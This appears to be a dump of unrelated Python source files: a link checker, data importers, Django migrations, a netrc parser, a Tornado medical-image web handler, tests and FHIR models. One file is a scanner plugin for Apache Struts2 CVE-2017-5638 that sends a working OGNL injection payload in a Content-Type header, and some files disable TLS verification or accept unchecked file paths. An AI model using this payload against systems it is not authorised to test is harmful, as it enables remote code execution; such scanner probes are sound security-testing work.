test_set_x_org: numpy 2d array, each row is a sample whose label to be predicted.
batch_size: int scalar, batch size, efficient for a very large number of test samples.
OUTPUTS:
test_set_y_predicted: numpy int vector, the class labels predicted.
test_set_y_predicted_prob: numpy float vector, the probabilities.
test_time: test time in seconds.
"""
start_time=time.clock()
test_set_x = theano.shared(numpy.asarray(test_set_x_org,dtype=theano.config.floatX),borrow=True)
test_model_func=classifier.build_test_function(test_set_x, batch_size)
test_set_y_predicted,test_set_y_predicted_prob=test_model_func()
end_time=time.clock()
test_time=end_time-start_time
return test_set_y_predicted,test_set_y_predicted_prob,test_time
|
import requests
import requests_ftp
import re
import sys
import urllib3
urllib3.disable_warnings()
# NOTE: urllib warnings are disabled because https certificate validation is disabled.
# In general, this is not a secure practice; see more here: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
# It was disabled here because of request failures caused by certificate-related errors
# that are encountered by automated scripts but not web users.
def makereq(url, protocol, timeout=10, allow_redirects=False):
# Sends a request using the specified protocol and interprets
# the response, returning either the HTTP/FTP status code or,
# in the case of request errors such as timeouts, "-1"
tosend = f'{protocol}://{url}'
try:
if protocol != 'ftp':
# NOTE: To avoid annoying quirks with SSL cert validation, this doesn't check whether
# the certs are valid.
r = requests.get(tosend, timeout=timeout, verify=False, stream=True, allow_redirects=allow_redirects)
else:
r = s.list(tosend, timeout=timeout)
except requests.exceptions.Timeout:
print(f' {protocol}: Timeout')
return -1
except requests.exceptions.ConnectionError as e:
print(f' {protocol}: Connection error: {e}')
return -1
except Exception as e:
print(f' {protocol}: WEIRD: {e} ({type(e)})')
return -1
# if the request completed:
print(f' {protocol}: {r.status_code}')
# If the request got a redirect response, follow the redirection to make
# sure the destination actually works:
if protocol == 'http' and r.status_code in range(300,400) and not allow_redirects:
print(f' {protocol}: Following redirects...')
new = makereq(url, protocol, timeout, True)
if new != 200: # TODO: Check why 200+ successful calls were recorded as 200s and not 301s
print(f' {protocol}: Broken redirect: Saving redirected status code {new}')
return new
if protocol == 'ftp' and r.status_code > 399:
# if the URL is to a file instead of a directory:
print(f' {protocol}: Trying SIZE instead of LIST')
r = s.size(tosend,timeout=timeout)
print(f' {protocol}: {r.status_code}')
return r.status_code
if __name__ == "__main__":
if len(sys.argv) < 3:
print("Script expects two command-line arguments: source file and output file.")
print("Example: `python recheck_timeouts.py ../analysis/links.bulk.csv output_new.csv`")
exit(1)
# Drag in the ftp adapter for the "requests" module:
requests_ftp.monkeypatch_session()
s = requests.Session()
# set a timeout that can be used for all the requests:
timeout = 10
with open(sys.argv[2], 'w', 1) as httpfile, open(sys.argv[1], 'r') as fileWithLinks:
skipFirstLine = fileWithLinks.readline() # skip header row
httpfile.write('type,journal,id,year,link,code,flag.uniqueness,oldcode,newlink\n')
linecount = 0
for line in fileWithLinks:
linecount += 1
elements = line.split(',')
code = int(elements[5])
# NOTE: This is where you can set which responses you want to double-check.
# Any entry for which this conditional returns True will get skipped.
if code not in range(300,400):
httpfile.write(','.join(elements))
continue
elements[6] = elements[6][0] # trim linebreak from last element
elements.append(elements[5]) # save value in 'oldcode' column
# remove (valid) protocols from URLs
url = re.sub('^https?://', '', elements[4])
url = re.sub('^s?ftps?://', '', url)
print(f'{linecount} Testing {url}')
ftpresult = -1
httpresult = makereq(url, 'http', timeout)
# if the http call isn't in our "success" category, try FTP:
if httpresult < 200 or httpresult > 399:
ftpresult = makereq(url, 'ftp', timeout)
# If we made an FTP call that didn't time out, record that status,
# otherwise use whatever the HTTP call returned:
elements[5] = str(httpresult if ftpresult == -1 else ftpresult)
elements.append(str('http' if ftpresult == -1 else 'ftp'))
# write the new entry to disk
httpfile.write(f'{",".join(elements)}\n')
|
#import numpy as np
# library of patterns
|
import os
import csv
import time
from flask_script import Command, Option
from cnf.settings import ROOT_PATH
class Import(Command):
option_list = (
Option('--source', '-s', dest='source'),
Option('--batch', '-b', dest='batch', default=1000),
)
def csv(self, filename):
_f = open(os.path.join(self.data_path, filename, ), 'r', encoding='iso8859')
r = csv.reader(_f)
next(r)
return r
def load_data(self, iterable, model, field_map, batch=1000):
total = 0
pending = []
for items in iterable:
items = [x for x in items if x]
if items:
pending.append(model(**dict(zip(field_map, items))))
total += 1
if len(pending) >= batch:
model.objects.insert(pending)
pending = []
if pending:
model.objects.insert(pending)
return total
def run(self, source, batch):
batch = int(batch)
self.data_path = source
from flask import current_app as app
with app.app_context():
from cnf.models import (
CNFFoodGroup, CNFFoodSource, CNFFoodName, CNFNutrientAmount,
CNFNutrientName, CNFNutrientSource, CNFRefuseAmount, CNFRefuseName,
CNFYieldAmount, CNFYieldName, CNFConversionFactor, CNFMeasureName
)
# I'll make this pep8 some day, maybe :)
STEPS = (
('FOOD GROUP.csv', CNFFoodGroup, ('id', 'code', 'name', 'name_f')),
('FOOD SOURCE.csv', CNFFoodSource, ('id', 'code', 'description', 'description_f')),
('FOOD NAME.csv', CNFFoodName, ('id', 'code', 'food_group', 'food_source', 'description', 'description_f', 'date_of_entry', 'date_of_publication', 'country_code', 'scientific_name')),
('NUTRIENT AMOUNT.csv', CNFNutrientAmount, ('food', 'nutrient_name', 'nutrient_value', 'standard_error', 'number_of_observations', 'nutrient_source', 'date_of_entry')),
('NUTRIENT NAME.csv', CNFNutrientName, ('id', 'nutrient_code', 'nutrient_symbol', 'unit', 'name', 'name_f', 'tagname', 'nutrient_decimals')),
('NUTRIENT SOURCE.csv', CNFNutrientSource, ('id', 'code', 'description', 'description_f')),
('CONVERSION FACTOR.csv', CNFConversionFactor, ('food', 'measure', 'value', 'date_of_entry')),
('MEASURE NAME.csv', CNFMeasureName, ('id', 'name', 'name_f')),
('REFUSE AMOUNT.csv', CNFRefuseAmount, ('food', 'refuse_name', 'amount', 'date_of_entry')),
('REFUSE NAME.csv', CNFRefuseName, ('id', 'name', 'name_f')),
('YIELD AMOUNT.csv', CNFYieldAmount, ('food', 'yield_name', 'amount')),
('YIELD NAME.csv', CNFYieldName, ('id', 'name', 'name_f')),
)
for filename, model, fields in STEPS:
print('Importing', filename)
# TODO Dropping everything probably should be an option
# Not sure what to expect when you don't though
print(' Dropping all items')
model.objects.all().delete()
s = time.time()
cf = self.csv(filename)
count = self.load_data(cf, model, fields, batch=batch)
d = time.time() - s
print(' ', count, 'rows imported in %.04fs\n' % d)
|
"""Config file"""
DATABASE_URI = "postgresql://username.password@port/database"
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('jssmanifests', '0019_auto_20150618_1543'),
]
operations = [
migrations.CreateModel(
name='JSSSite',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('jsssiteid', models.IntegerField(verbose_name=b'JSS Site ID')),
('jsssitename', models.CharField(max_length=1024, verbose_name=b'Type Label')),
],
),
migrations.CreateModel(
name='JSSUser',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('lastrefresh', models.DateTimeField(auto_now=True)),
('sites', models.ManyToManyField(to='jssmanifests.JSSSite')),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
]
|
"""An object-oriented interface to .netrc files."""
# Module and documentation by Eric S. Raymond, 21 Dec 1998
from __future__ import with_statement
import os, shlex
__all__ = ["netrc", "NetrcParseError"]
class NetrcParseError(Exception):
"""Exception raised on syntax errors in the .netrc file."""
def __init__(self, msg, filename=None, lineno=None):
self.filename = filename
self.lineno = lineno
self.msg = msg
Exception.__init__(self, msg)
def __str__(self):
return "%s (%s, line %s)" % (self.msg, self.filename, self.lineno)
class netrc:
def __init__(self, file=None):
if file is None:
try:
file = os.path.join(os.environ['HOME'], ".netrc")
except KeyError:
raise IOError("Could not find .netrc: $HOME is not set")
self.hosts = {}
self.macros = {}
with open(file) as fp:
self._parse(file, fp)
def _parse(self, file, fp):
lexer = shlex.shlex(fp)
lexer.wordchars += r"""!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
while 1:
# Look for a machine, default, or macdef top-level keyword
toplevel = tt = lexer.get_token()
if not tt:
break
elif tt == 'machine':
entryname = lexer.get_token()
elif tt == 'default':
entryname = 'default'
elif tt == 'macdef': # Just skip to end of macdefs
entryname = lexer.get_token()
self.macros[entryname] = []
lexer.whitespace = ' \t'
while 1:
line = lexer.instream.readline()
if not line or line == '\012':
lexer.whitespace = ' \t\r\n'
break
self.macros[entryname].append(line)
continue
else:
raise NetrcParseError(
"bad toplevel token %r" % tt, file, lexer.lineno)
# We're looking at start of an entry for a named machine or default.
login = ''
account = password = None
self.hosts[entryname] = {}
while 1:
tt = lexer.get_token()
if (tt=='' or tt == 'machine' or
tt == 'default' or tt =='macdef'):
if password:
self.hosts[entryname] = (login, account, password)
lexer.push_token(tt)
break
else:
raise NetrcParseError(
"malformed %s entry %s terminated by %s"
% (toplevel, entryname, repr(tt)),
file, lexer.lineno)
elif tt == 'login' or tt == 'user':
login = lexer.get_token()
elif tt == 'account':
account = lexer.get_token()
elif tt == 'password':
password = lexer.get_token()
else:
raise NetrcParseError("bad follower token %r" % tt,
file, lexer.lineno)
def authenticators(self, host):
"""Return a (user, account, password) tuple for given host."""
if host in self.hosts:
return self.hosts[host]
elif 'default' in self.hosts:
return self.hosts['default']
else:
return None
def __repr__(self):
"""Dump the class data in the format of a .netrc file."""
rep = ""
for host in self.hosts.keys():
attrs = self.hosts[host]
rep = rep + "machine "+ host + "\n\tlogin " + repr(attrs[0]) + "\n"
if attrs[1]:
rep = rep + "account " + repr(attrs[1])
rep = rep + "\tpassword " + repr(attrs[2]) + "\n"
for macro in self.macros.keys():
rep = rep + "macdef " + macro + "\n"
for line in self.macros[macro]:
rep = rep + line
rep = rep + "\n"
return rep
if __name__ == '__main__':
print netrc()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Ivar Vargas Belizario
# Copyright (c) 2021
# E-mail: ivar@usp.br
import tornado.ioloop
import tornado.web
import tornado.httpserver
import ujson
import glob
import os
import time
import sys
import pandas as pd
import numpy as np
import os.path
import math
import uuid
import zipfile
from io import BytesIO
from datetime import datetime
import threading
import SimpleITK as sitk
from bson.objectid import ObjectId
from vx.com.py.database.MongoDB import *
from vx.radpleura.Settings import *
from vx.radpleura.BaseHandler import *
from vx.radpleura.ROI import *
from vx.radpleura.Features import *
from vx.radpleura.VSI import *
from vx.radpleura.Classification import *
from vx.radpleura.SplitImage import *
class Query(BaseHandler):
#Get RequestHandler
def get(self):
dat = self.get_argument('data')
app = ujson.loads(dat)
#app = DataTransfer()
#app.load(dat)
obj = ""
if app["argms"]["type"]==0:
pass;
elif app["argms"]["type"]==1:
obj = self.listimages();
#elif app["argms"]["type"]==2:
# obj = self.listfilesdirs(app["argms"]);
elif app["argms"]["type"]==3:
obj = self.makeimgfromvsi(app["argms"]);
elif app["argms"]["type"]==4:
obj = None
elif app["argms"]["type"]==5:
obj = self.getregions(app["argms"]);
# print("obj-x",obj);
elif app["argms"]["type"]==7:
obj = self.makeclassification(self.current_user, app["argms"]);
# print("obj-x",obj);
elif app["argms"]["type"]==8:
obj = self.listprojects(self.current_user, app["argms"]);
# print("obj-x",obj);
elif app["argms"]["type"]==9:
obj = self.openproject(self.current_user, app["argms"]);
self.write(obj)
self.finish()
#Post RequestHandler
def post(self):
dat = self.get_argument('data')
app = ujson.loads(dat)
rs = ""
if self.current_user:
#print("app.argms", app, self.request.files['fileu'][0])
if app["argms"]["type"]==6:
rs = Query.uploadfiledata(self.current_user, self.request.files['fileu'][0]);
self.write(rs)
#pass
# static query methods
"""
def listimages():
fileso = []
for name in os.listdir(Settings.DATA_PATH):
# print("name", name)
if name.endswith(".png") or name.endswith(".jpg") or name.endswith(".jpeg"):
# fileso.append(str(os.path.join(outdir, str(name))))
# fileso.append({"name":Settings.IMAGE_PATH+str(name)})
fileso.append({"name":str(name)})
return {"response":fileso}
"""
@staticmethod
def openFile(pathf):
dfile = {}
with open(pathf,'r') as fp:
dfile = ujson.load(fp)
return dfile
@staticmethod
def writeFile(pathf, rdata):
with open(pathf,'w') as fp:
ujson.dump(rdata, fp)
@staticmethod
def listimages():
fileso = []
"""
for name in os.listdir(Settings.DATA_PATH):
if name.endswith(".png") or name.endswith(".jpg") or name.endswith(".jpeg"):
fileso.append({"name":str(name)})
"""
ini = 2021
months = ["01","02","03","04","05","06","07","08","09","10","11","12"]
now = 2021
for y in range(ini,now+1):
for m in months:
folder = os.path.join(Settings.DATA_PATH,str(y),str(m))
if os.path.exists(folder):
for ide in os.listdir(folder):
if os.path.isdir(os.path.join(folder, ide)):
fileobj = os.path.join(folder, ide, "db.obj")
if os.path.exists(fileobj):
dat = Query.openFile(fileobj)
#print("dat",dat, fileobj)
fileso.append(dat)
#fileso[ide] = {"y":y, "m":m, "data":dat}
#fileso.sort(key=lambda item:item['date'], reverse=True)
#fileso = sorted(fileso.items(), key=lambda x: x["date"])
#fileso = sorted(fileso, key=lambda k: k['date'])
#print(fileso)
fileso = sorted(fileso, key = lambda i: (i['date']), reverse=True)
return {"response":fileso}
# static query methods
@staticmethod
def listfilesdirs(argms):
path = argms["path"]
direc = argms["directory"]
pathi = path
if direc!="":
pathi += "/"+direc
result = []
#print("path", path)
#print("direc", direc)
pathi = os.path.join(path,direc)
#print("pathii", pathi)
try:
for fil in os.listdir(pathi):
cc = os.path.join(pathi,fil)
modTimesinceEpoc = os.path.getmtime(cc)
modificationTime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(modTimesinceEpoc))
#print("cc",cc)
if os.path.isfile(cc):
result.append({"name":fil,"type":1,"date":modificationTime})
else:
result.append({"name":fil,"type":0,"date":modificationTime})
result = sorted(result, key=lambda k: (k['type'], k['name']))
result = {"response":{"path":pathi,"files":result}, "error":0}
except FileNotFoundError:
result = {"response":"FileNotFoundError", "error":1}
except PermissionError:
result = {"response":"PermissionError", "error":1}
except:
result = {"response":"UndefinedError", "error":1}
finally:
#print("Done error checking")
pass
return result
# static query methods
@staticmethod
def openproject(iduser, argms):
idpj = ObjectId(argms["idpj"])
print("idpj", idpj)
res = list(MongoDB.find(DBS.DBMEDIA, "app_lung", {"_id": idpj}))
for rs in res:
rs["_id"] = str(rs["_id"])
rs["_id_user"] = str(rs["_id_user"])
pf = os.path.join(Settings.DATA_PATH, rs["y"]+"/"+rs["m"]+"/"+rs["_id"]+"/pieces.json");
if os.path.exists(pf):
#print("pahfile", pf)
rs["pieces"] = Query.openFile(pf)
#print("roisx", rois)
rs["pathpieces"] = "data/"+rs["y"]+"/"+rs["m"]+"/"+rs["_id"]+"/pieces/"
print("rs", res)
return {"response":res, "error":0}
# static query methods
@staticmethod
def listprojects(iduser, argms):
#iduser = argms["iduser"]
iduser = ObjectId(iduser.decode("utf-8"))
#print("iduser xxxx", iduser)
#rest = []
rs = list(MongoDB.aggregate(DBS.DBMEDIA, "app_lung",
[
{"$lookup":
{
"from": "user",
"localField": "_id_user",
"foreignField" : "_id",
"as": "usersUnits",
}
},
{"$match": {
"$or": [
{"_id_user": iduser},
{"shared": 1}
]
}
},
{"$project":
{
"_id" : 1,
"_id_user": 1 ,
"name": 1,
"date_update" : 1,
"factor" : 1,
"m" : 1,
"y" : 1,
"shared" : 1,
"status" : 1,
"statusmsg" : 1,
"usersUnits._id" : 1 ,
"usersUnits.name" : 1 ,
}
},
{
"$sort": {
"date_update": -1
}
}
]
))
#print("xxxxresx", rs)
#{"_id_user": iduser}))
print("zzzzzzsrs", rs)
for i in range(len(rs)):
rs[i]["_id"] = str(rs[i]["_id"])
rs[i]["_id_user"] = str(rs[i]["_id_user"])
if len(rs[i]["usersUnits"])==1:
rs[i]["usersUnits"][0]["_id"] = str(rs[i]["usersUnits"][0]["_id"])
#row["rois"] = []
return {"response":rs, "error":0}
@staticmethod
def makedir(outdir):
if not os.path.exists(outdir):
os.makedirs(outdir)
@staticmethod
def getPathSave(mainpath):
dt_year = datetime.now().strftime("%Y")
dt_mont = datetime.now().strftime("%m")
mpth = os.path.join(mainpath, dt_year, dt_mont)
Query.makedir(mpth)
return dt_year, dt_mont, mpth
# static query methods
@staticmethod
def makeimgfromvsi(argms):
name = argms["name"]
path = argms["path"]
file = argms["file"]
factor = argms["factor"]
#print("CC",name, path, file, factor)
vsifile = os.path.join(path,file)
""" pathsave = getdiresave(Settings.DATA_PATH) """
#convertvsi2img(vsifile, factor, Settings.DATA_PATH, "df3wfsd")
y, m, idf, pathsave = Query.getPathSave(Settings.DATA_PATH)
fileid = uuid.uuid4().hex
t = threading.Thread(target=Query.convertvsi2img, args=(vsifile, factor, pathsave, fileid,))
t.start()
dt_string = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
dbdat = {
"y":y,
"m":m,
"id":idf,
"name":name,
"date":dt_string,
"image":fileid+".jpg",
"tumbail":fileid+".jpg",
"atributes":{"factor":factor,"status":0,"statusmsg":"working..."},
"images":[]
}
"""
"images":[
{
"name":"original",
"date":dt_string,
"image":fileid+".jpg",
"tumbail":fileid+"_tumbail.jpg",
"atributes":{},
}
]
"""
Query.writeFile(os.path.join(pathsave,"db.obj"), dbdat)
#makeimage(filevis, factor, pathsave)
result = {"response":"ok", "error":0}
return result
# get regions
@staticmethod
def getregions(argms):
results = None
try:
pahfile = os.path.join(Settings.DATA_PATH, argms["path"]+"/"+"contours.json")
print("pahfile", pahfile)
rois = Query.openFile(pahfile)
print("roisx", rois)
results = {"response":rois, "error":0}
except FileNotFoundError:
results = {"response":"FileNotFoundError", "error":1}
print("error file not")
except PermissionError:
results = {"response":"PermissionError", "error":1}
print("permission error")
except:
results = {"response":"UndefinedError", "error":1}
print("error undefined")
finally:
#print("Done error checking")
pass
return results
@staticmethod
def convertvsi2img(vsifile, factor, pathout, outfile):
outfiletiff = os.path.join(pathout,outfile+".tiff")
outfilejpg = os.path.join(pathout,outfile+".jpg")
outtumbailjpg = os.path.join(pathout,outfile+"_tumbail.jpg")
BaseManager.register('VSI', VSI, exposed=['getAux','getnTilesX','getnTilesY'])
manager = BaseManager()
manager.start()
obj = manager.VSI(vsifile, float(factor))
#print("obj.aux", obj.getAux())
#obj = VSI(vsifile, float(factor))
image = VSI.makeimage(obj)
#image = readVSI(vsifile, float(factor))
cv2.imwrite(outfiletiff, image)
cv2.imwrite(outfilejpg, image)
fileobj = os.path.join(pathout, "db.obj")
dat = Query.openFile(fileobj)
dat["atributes"]["status"] = 1
dat["atributes"]["statusmsg"] = ""
Query.writeFile(fileobj, dat)
@staticmethod
def uploadfiledata(iduser, file):
r = """<script>
parent.mwalert('','Error: upload file');
parent.openprojects();
</script>"""
iduser = ObjectId(iduser.decode("utf-8"))
path = Settings.DATA_PATH
fname, ext = os.path.splitext(file['filename'])
ext = ext.lower()
ye, mo, path = Query.getPathSave(Settings.DATA_PATH)
rowdata = {
"_id_user":iduser,
"name":fname,
"y":ye,
"m":mo,
"date_create":Query.now(),
"date_update":Query.now(),
"factor":1.0,
"rois":[],
"shared":0,
"status":1,
"statusmsg":"new data lung...",
}
idin = None
try:
idin = MongoDB.insert(DBS.DBMEDIA, "app_lung", rowdata)
idin = str(idin)
idin = Query.converid(idin)
rs = list(MongoDB.find(DBS.DBMEDIA, "app_lung", {"_id": idin}))
for rr in rs:
tilesize = 500
tileperce = 0.01
path = os.path.join(path, str(idin))
Query.makedir(path)
Query.savefile(path, file['body'])
ROI.execute(path, tilesize, tileperce)
Features.execute(path)
SplitImage.execute(path, 500)
r = "<script>parent.openprojects();</script>"
except Exception as e:
print("error upload file", e)
if idin != None:
Query.dropdataset(os.path.join(Settings.DATA_PATH, ye, mo, str(idin)) )
return r
@staticmethod
def dropdataset(idin):
filefe = str(idin)
#os.system("rm -rf "+filefe)
MongoDB.delete(DBS.DBMEDIA, "app_lung", {"_id": ObjectId(idin)})
r = "<script>parent.openprojects();</script>"
return {"response":r};
@staticmethod
def makeclassification(usid, argms):
idus = usid
idpj = argms["idpj"]
idrois = argms["idroi"]
idmodelversion = argms["idmodelversion"]
idmodel = argms["idmodel"]
print("argms classs", argms)
parthquery = os.path.join(Settings.DATA_PATH, argms["path"])
#parthquery = os.path.join(Settings.DATA_PATH, argms["path"])
ypred, labels = Classification.predict(parthquery, idmodelversion, idmodel, idrois)
rs = {"yp":ypred, "labels":labels}
print("rs", rs)
return {"statusopt":0, "statusval":"", "response":rs}
#return {"statusopt":0, "statusval":"", "response":[]}
@staticmethod
def savefile(path, data):
pfiletiff = os.path.join(path, "original.tiff")
pfilejpg = os.path.join(path, "original.jpg")
#create directory
output_file = open(pfiletiff, mode="wb")
output_file.write(data)
output_file.close()
image = sitk.ReadImage(pfiletiff)
sitk.WriteImage(image, pfilejpg)
@staticmethod
def now():
return datetime.now().strftime('%Y-%m-%d %H:%M:%S')
@staticmethod
def converid(idin):
"""
#idin = file
if Settings.MULIUSER == 1:
#idin = idin.decode("utf-8");
idin = ObjectId(idin) """
idin = ObjectId(idin)
return idin
|
import requests
from celery_app.utils.utils import insert_vuln_db
from celery_app.config.config import web_port_short
#Apache Struts2-045 远程代码执行(CVE-2017-5638)
plugin_id=42
default_port_list=web_port_short
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
hits = ['biuframework']
try:
targets = [target]
headers = {"Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('biu'+'framework')).(#o.close())}"}
#requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=10, verify=False, headers=headers)
for hit in hits:
if hit in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
|
import os
import tempfile
import pytest
from reminders import app
@pytest.fixture
def client():
db_fd, app.config['DATABASE'] = tempfile.mkstemp()
app.config['TESTING'] = True
with app.test_client() as client:
yield client
os.close(db_fd)
os.unlink(app.config['DATABASE'])
def test_basic_fetch(client):
"""Basic get should list reminders."""
res = client.get('/')
assert b'All Your Reminders' in res.data
def test_save_check_data(client):
"""Save should require a reminder message."""
res = client.post('/save', data="")
assert b'This field is required' in res.data
|
from .changelog import Changelog
from .types import ChangelogType
from .changelog_spec import ConventionalCommitChangelog
__all__ = (Changelog, ConventionalCommitChangelog, ChangelogType)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-04 06:31
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0002_auto_20160904_1201'),
]
operations = [
migrations.RenameModel(
old_name='Battles',
new_name='Battle',
),
]
|
import os
import configparser
import pytest
from rjm.runners import funcx_slurm_runner
from rjm.errors import RemoteJobRunnerError
@pytest.fixture
def configobj():
config = configparser.ConfigParser()
config["FUNCX"] = {
"remote_endpoint": "abcdefg",
}
config["SLURM"] = {
"slurm_script": "run.sl",
"poll_interval": "1",
}
return config
@pytest.fixture
def runner(mocker, configobj):
mocker.patch('rjm.config.load_config', return_value=configobj)
runner = funcx_slurm_runner.FuncxSlurmRunner()
return runner
def mocked_run_function(function, *args, **kwargs):
return function(*args, **kwargs)
def test_make_remote_directory_single(runner, tmpdir):
runner.run_function = mocked_run_function
remote_base_path = str(tmpdir)
prefix = "my-remote-dir"
full_path, basename = runner.make_remote_directory(remote_base_path, prefix)
assert os.path.basename(full_path) == basename
assert os.path.join(remote_base_path, basename) == full_path
assert os.path.isdir(full_path)
assert basename.startswith(prefix)
def test_make_remote_directory_list(runner, tmpdir):
runner.run_function = mocked_run_function
remote_base_path = str(tmpdir)
prefixes = ["my-remote-dir", "another-remote-dir"]
remote_dirs = runner.make_remote_directory(remote_base_path, prefixes)
assert type(remote_dirs) is list
assert len(remote_dirs) == len(prefixes)
for prefix, (full_path, basename) in zip(prefixes, remote_dirs):
assert os.path.basename(full_path) == basename
assert os.path.join(remote_base_path, basename) == full_path
assert os.path.isdir(full_path)
assert basename.startswith(prefix)
def test_start_fail(runner, mocker):
mocked = mocker.patch(
'rjm.runners.funcx_slurm_runner.FuncxSlurmRunner.run_function',
return_value=(1, "mocking failure")
)
with pytest.raises(RemoteJobRunnerError):
runner.start("some_path")
assert mocked.call_count == 1
def test_start_succeed(runner, mocker):
mocked = mocker.patch(
'rjm.runners.funcx_slurm_runner.FuncxSlurmRunner.run_function',
return_value=(0, "Submitted batch job 1234567"),
)
started = runner.start("some/path")
assert mocked.called_once()
assert started is True
assert runner._jobid == '1234567'
def test_wait_fail(runner, mocker):
runner._jobid = '123456'
mocked = mocker.patch(
'rjm.runners.funcx_slurm_runner.FuncxSlurmRunner.run_function',
return_value=(1, "mocking failure")
)
with pytest.raises(RemoteJobRunnerError):
runner.wait()
assert mocked.call_count == 1
def test_wait_succeed(runner, mocker):
mocked_sleep = mocker.patch('time.sleep')
runner._jobid = '123456'
mocked = mocker.patch(
'rjm.runners.funcx_slurm_runner.FuncxSlurmRunner.run_function',
side_effect=[
(0, "PENDING"),
(0, "RUNNING"),
(0, "COMPLETED"),
],
)
completed = runner.wait()
assert mocked.call_count == 3
assert completed is True
assert mocked_sleep.call_count == 2
def test_calculate_checksums(runner, tmpdir):
text = """test file with some text"""
expected = "337de094ee88f1bc965a97e1d6767f51a06fd1e6e679664625ff68546e3d2601"
test_file = "testchecksum.txt"
test_file_not_exist = "notexist.txt"
with open(os.path.join(tmpdir, test_file), "w") as fh:
fh.write(text)
returncode, checksums = funcx_slurm_runner._calculate_checksums(
[test_file, test_file_not_exist],
str(tmpdir),
)
assert returncode == 0
assert checksums[test_file] == expected
assert checksums[test_file_not_exist] is None
|
from dagster import (
Output,
InputDefinition,
OutputDefinition,
solid,
pipeline,
List as DagsterList,
String,
)
from dagster_aws.s3 import S3Coordinate
from os import walk
from dotenv import load_dotenv
import boto3
import ntpath
import os
load_dotenv()
@solid(
name="uploadObjectToS3",
description="""
**Uploads the dump files to S3 Server**
### Authors
stejul <https://github.com/stejul>
""",
input_defs=[
InputDefinition(name="local_files", dagster_type=DagsterList[String]),
InputDefinition(name="s3_coordinate", dagster_type=S3Coordinate),
],
output_defs=[OutputDefinition(dagster_type=S3Coordinate)],
)
def upload_to_s3(
context, local_files: DagsterList[String], s3_coordinate: S3Coordinate
) -> S3Coordinate:
s3 = boto3.client(
service_name="s3",
endpoint_url="http://localhost:9000",
aws_access_key_id=os.getenv("MINIO_USER"),
aws_secret_access_key=os.getenv("MINIO_PASSWORD"),
)
s3Resource = boto3.resource(
service_name="s3",
endpoint_url="http://localhost:9000",
aws_access_key_id=os.getenv("MINIO_USER"),
aws_secret_access_key=os.getenv("MINIO_PASSWORD"),
)
return_s3_coordinate: S3Coordinate = {"bucket": s3_coordinate["bucket"]}
for file in local_files:
head, tail = ntpath.split(file)
return_s3_coordinate["key"] = s3_coordinate["key"] + "/" + tail
if s3Resource.Bucket(return_s3_coordinate["bucket"]).creation_date is None:
s3.create_bucket(Bucket=return_s3_coordinate["bucket"])
s3.upload_file(
Filename=f"{head}/{tail}",
Bucket=return_s3_coordinate["bucket"],
Key=return_s3_coordinate["key"],
)
context.log.info(f"Uploaded successfully - {file}")
return Output(return_s3_coordinate)
@solid(
name="getListOfFiles",
description="""
Checks the data directory and returns a list of files
""",
output_defs=[OutputDefinition(dagster_type=DagsterList[String])],
)
def get_all_csv_files(context, info_scraper) -> DagsterList[String]:
context.log.info(f"Info dump is available {info_scraper}")
result: DagsterList[String] = []
for (dirpath, dirname, filenames) in walk("src/data/"):
for file in filenames:
context.log.info(f"Found following file in directory: src/data/{file}")
result.append(f"src/data/{file}")
return result
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.1-9346c8cc45 (http://hl7.org/fhir/StructureDefinition/BiologicallyDerivedProduct) on 2020-02-03.
# 2020, SMART Health IT.
import sys
from dataclasses import dataclass, field
from typing import ClassVar, Optional, List
from .backboneelement import BackboneElement
from .codeableconcept import CodeableConcept
from .domainresource import DomainResource
from .fhirdate import FHIRDate
from .fhirreference import FHIRReference
from .identifier import Identifier
from .period import Period
@dataclass
class BiologicallyDerivedProductCollection(BackboneElement):
""" How this product was collected.
"""
resource_type: ClassVar[str] = "BiologicallyDerivedProductCollection"
collector: Optional[FHIRReference] = None
source: Optional[FHIRReference] = None
collectedDateTime: Optional[FHIRDate] = field(default=None, metadata=dict(one_of_many='collected',))
collectedPeriod: Optional[Period] = field(default=None, metadata=dict(one_of_many='collected',))
@dataclass
class BiologicallyDerivedProductProcessing(BackboneElement):
""" Any processing of the product during collection.
Any processing of the product during collection that does not change the
fundamental nature of the product. For example adding anti-coagulants
during the collection of Peripheral Blood Stem Cells.
"""
resource_type: ClassVar[str] = "BiologicallyDerivedProductProcessing"
description: Optional[str] = None
procedure: Optional[CodeableConcept] = None
additive: Optional[FHIRReference] = None
timeDateTime: Optional[FHIRDate] = field(default=None, metadata=dict(one_of_many='time',))
timePeriod: Optional[Period] = field(default=None, metadata=dict(one_of_many='time',))
@dataclass
class BiologicallyDerivedProductManipulation(BackboneElement):
""" Any manipulation of product post-collection.
Any manipulation of product post-collection that is intended to alter the
product. For example a buffy-coat enrichment or CD8 reduction of
Peripheral Blood Stem Cells to make it more suitable for infusion.
"""
resource_type: ClassVar[str] = "BiologicallyDerivedProductManipulation"
description: Optional[str] = None
timeDateTime: Optional[FHIRDate] = field(default=None, metadata=dict(one_of_many='time',))
timePeriod: Optional[Period] = field(default=None, metadata=dict(one_of_many='time',))
@dataclass
class BiologicallyDerivedProductStorage(BackboneElement):
""" Product storage.
"""
